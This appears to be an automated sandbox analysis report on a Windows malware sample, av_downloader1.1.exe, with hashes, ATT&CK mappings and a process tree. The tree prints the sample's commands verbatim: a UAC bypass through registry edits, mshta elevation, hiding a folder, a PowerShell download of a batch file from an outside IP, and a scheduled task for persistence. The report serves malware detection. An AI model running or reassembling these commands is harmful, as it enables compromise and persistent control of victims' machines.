Analysis
-
max time kernel
147s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17-10-2024 18:11
Static task
static1
Behavioral task
behavioral1
Sample
av_downloader1.1.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
av_downloader1.1.exe
Resource
win10v2004-20241007-en
General
-
Target
av_downloader1.1.exe
-
Size
88KB
-
MD5
759f5a6e3daa4972d43bd4a5edbdeb11
-
SHA1
36f2ac66b894e4a695f983f3214aace56ffbe2ba
-
SHA256
2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
-
SHA512
f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385
-
SSDEEP
1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf+xB4O5:fq6+ouCpk2mpcWJ0r+QNTBf+LV
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 16 3076 powershell.exe -
pid Process 3076 powershell.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 352 attrib.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation AV_DOW~1.EXE Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation av_downloader1.1.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation mshta.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 1776 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language av_downloader1.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AV_DOW~1.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3284 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 3076 powershell.exe 3076 powershell.exe 3428 msedge.exe 3428 msedge.exe 3352 msedge.exe 3352 msedge.exe 2136 identity_helper.exe 2136 identity_helper.exe 2928 msedge.exe 2928 msedge.exe 2928 msedge.exe 2928 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3076 powershell.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe 3352 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1688 wrote to memory of 2208 1688 av_downloader1.1.exe 85 PID 1688 wrote to memory of 2208 1688 av_downloader1.1.exe 85 PID 2208 wrote to memory of 1776 2208 cmd.exe 88 PID 2208 wrote to memory of 1776 2208 cmd.exe 88 PID 1776 wrote to memory of 2392 1776 mshta.exe 90 PID 1776 wrote to memory of 2392 1776 mshta.exe 90 PID 1776 wrote to memory of 2392 1776 mshta.exe 90 PID 2392 wrote to memory of 5008 2392 AV_DOW~1.EXE 91 PID 2392 wrote to memory of 5008 2392 AV_DOW~1.EXE 91 PID 5008 wrote to memory of 3652 5008 cmd.exe 93 PID 5008 wrote to memory of 3652 5008 cmd.exe 93 PID 5008 wrote to memory of 3888 5008 cmd.exe 94 PID 5008 wrote to memory of 3888 5008 cmd.exe 94 PID 5008 wrote to memory of 4060 5008 cmd.exe 95 PID 5008 wrote to memory of 4060 5008 cmd.exe 95 PID 5008 wrote to memory of 412 5008 cmd.exe 96 PID 5008 wrote to memory of 412 5008 cmd.exe 96 PID 412 wrote to memory of 216 412 cmd.exe 97 PID 412 wrote to memory of 216 412 cmd.exe 97 PID 5008 wrote to memory of 3352 5008 cmd.exe 99 PID 5008 wrote to memory of 3352 5008 cmd.exe 99 PID 5008 wrote to memory of 352 5008 cmd.exe 100 PID 5008 wrote to memory of 352 5008 cmd.exe 100 PID 3352 wrote to memory of 1080 3352 msedge.exe 101 PID 3352 wrote to memory of 1080 3352 msedge.exe 101 PID 5008 wrote to memory of 3076 5008 cmd.exe 102 PID 5008 wrote to memory of 3076 5008 cmd.exe 102 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 PID 3352 wrote to memory of 3784 3352 msedge.exe 103 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 352 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\av_downloader1.1.exe"C:\Users\Admin\AppData\Local\Temp\av_downloader1.1.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BA18.tmp\BA19.tmp\BA1A.bat C:\Users\Admin\AppData\Local\Temp\av_downloader1.1.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)3⤵
- Checks computer location settings
- Access Token Manipulation: Create Process with Token
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE"C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE" goto :target4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BCF7.tmp\BCF8.tmp\BCF9.bat C:\Users\Admin\AppData\Local\Temp\AV_DOW~1.EXE goto :target"5⤵
- Suspicious use of WriteProcessMemory
PID:5008 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:3652
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:3888
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F6⤵
- UAC bypass
PID:4060
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"6⤵
- Suspicious use of WriteProcessMemory
PID:412 -
C:\Windows\system32\reg.exereg query HKEY_CLASSES_ROOT\http\shell\open\command7⤵PID:216
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/6⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffe16646f8,0x7fffe1664708,0x7fffe16647187⤵PID:1080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,3278645532249578144,2762033885263882925,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:27⤵PID:3784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,3278645532249578144,2762033885263882925,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:37⤵
- Suspicious behavior: EnumeratesProcesses
PID:3428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,3278645532249578144,2762033885263882925,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2668 /prefetch:87⤵PID:4924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3278645532249578144,2762033885263882925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:17⤵PID:900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3278645532249578144,2762033885263882925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:17⤵PID:392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3278645532249578144,2762033885263882925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:17⤵PID:2656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,3278645532249578144,2762033885263882925,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5440 /prefetch:87⤵PID:2380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,3278645532249578144,2762033885263882925,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5440 /prefetch:87⤵
- Suspicious behavior: EnumeratesProcesses
PID:2136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3278645532249578144,2762033885263882925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:17⤵PID:236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3278645532249578144,2762033885263882925,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4592 /prefetch:17⤵PID:3636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3278645532249578144,2762033885263882925,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:17⤵PID:1512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,3278645532249578144,2762033885263882925,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:17⤵PID:4316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,3278645532249578144,2762033885263882925,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5388 /prefetch:27⤵
- Suspicious behavior: EnumeratesProcesses
PID:2928
-
-
-
C:\Windows\system32\attrib.exeattrib +s +h d:\net6⤵
- Sets file to hidden
- Views/modifies file attributes
PID:352
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3076
-
-
C:\Windows\system32\schtasks.exeSchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:3284
-
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1204
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4028
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Access Token Manipulation
1Create Process with Token
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Access Token Manipulation
1Create Process with Token
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
1Disable or Modify Tools
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5e443ee4336fcf13c698b8ab5f3c173d0
SHA19bf70b16f03820cbe3158e1f1396b07b8ac9d75a
SHA25679e277da2074f9467e0518f0f26ca2ba74914bee82553f935a0ccf64a0119e8b
SHA512cbf6f6aa0ea69b47f51592296da2b7be1180e7b483c61b4d17ba9ee1a2d3345cbe0987b96f4e25de1438b553db358f330aad8a26e8522601f055c3d5a8313cdd
-
Filesize
152B
MD556a4f78e21616a6e19da57228569489b
SHA121bfabbfc294d5f2aa1da825c5590d760483bc76
SHA256d036661e765ee8fd18978a2b5501e8df6b220e4bca531d9860407555294c96fb
SHA512c2c3cd1152bb486028fe75ab3ce0d0bc9d64c4ca7eb8860ddd934b2f6e0140d2c913af4fa082b88e92a6a6d20fd483a1cb9813209f371a0f56374bc97d7f863b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize792B
MD593a559f0fca1cc656dcaf9edf59cc3b5
SHA1edbb0a555e98e73ccd85908ce6016e3f24d2bd3b
SHA256a43c67766f39014bbe9aa78e6659cf5b9bd7329b03adb51336d79a346c863f69
SHA5124b78e71efec1d0289107839971f33d214b9dd026786dd3fa86a804e034436f3aa1fedd389af75a991a04623e7c8047792be5644e1bd3a5ccaccefdf83744273f
-
Filesize
1KB
MD52587109f9d42c918e581248203ac0c7c
SHA1697e7d9070abae23d92c75a12c3c1495503f8c33
SHA2564e5ac2eb5f7041d3bffe99f60bf9e66b021e79f5496947f5b56412668b738d5e
SHA51255485a4171f57f14245e6583c7b8bba64394b5570192883e579533441cea0211e18dc4941ab024acd621a0d8b0375b0a7a6009b820bf313f826893096bb4e373
-
Filesize
5KB
MD5a47eb876bedf9f2f45c0149ce5d9f929
SHA14f6bedc39be8df3e50fee565dad84917117a8d68
SHA2569be5986a53895ce598ea67deb509005a3cf8b37bf234d5f8179b49ec0156e883
SHA5128e8fd167d61e984b29f1524140741c7255b6febbd1b1c9ef20368582c1b9ed987c4d7faa4162b8d3aa7b40dff89ca34315d873b6446ff1eb20ff561a68e91a21
-
Filesize
7KB
MD54e5527cfe14e55fbe36e70e00841dc1a
SHA1ddd4623f35343ff2aeb0dedbbef953f46c31035f
SHA2563b5480623da26ca066296fa84c0ed75465ecd45ec49ba37e635ff232c5ccdd91
SHA512da501165706f327fcd03f5faf195c03b0b9d70dff8db1a5207e2235cb3d23a31319c7dd1a8e955ce0a8fe0955084e519cc1bec9e577c55c576b83c36e335098b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize96B
MD5da1b4da6870f2225054d736b55f14c3c
SHA15b9aa0093c781e5848aebb1c1ca98e25bffaf097
SHA25683a7f652987b2cf960a34b7d4093e33f857d3756ff094de05994fea157ce7d81
SHA51227ddeb7114e8120b88b007dca258f14067778d9a206393ea0693fd3128b2f9759f498df56574908642861c9631d11300de0aa95f4f4a177add2e6cea86f35c54
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58197e.TMP
Filesize48B
MD52929eb97a7f1535b8c8db7aad959d7a0
SHA1ea566d804eda5abcac2bd23e5d322adf1ba46c5f
SHA2560b2d73b2a03c0b7588a9abfa9645fc9e23e341b4fb2163421c1725dec269e806
SHA51253bf59703897172b6f2671d8bbbe0c61b12762ecb3140724232f196290a494f2d2abb5c7ad90792ed6265015f17a2eb9bdee4b0276f2d76c4206fd0829102330
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD5448c3adb5ab673f66329cfcac7f5f623
SHA1014ffed8f15e91a8da1dae6841bd45731a249485
SHA256f8e096ff83adabbb4d19e3050c89c82dd7a951caa70936ffd1f8b52adf05553f
SHA5129340e453b635c2cd46bc0c65b36f8cbcd74ee58f70ed333b2186ed078550a0cc9e47d5eaa36770aeeef39cb1292905733f20b375d2c146bc37835ecf62cb846d
-
Filesize
1KB
MD59856d2fe29a28c54c5943c2150f7bae1
SHA1f7532a2a79b1b6aca1c151b34fe8b1ce2c798e97
SHA2560b6140b4764863f3263b0be87f35c9afe9a849823eccf37259bed08baa93e999
SHA512002db693f5664f80e58bb3590f32068f611bc97d3f71324abb659dd1fd0bffe3df36379ae92ffbeabde10bd6245b3c069b56ba4d8b4608c634a2525e7a76735f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82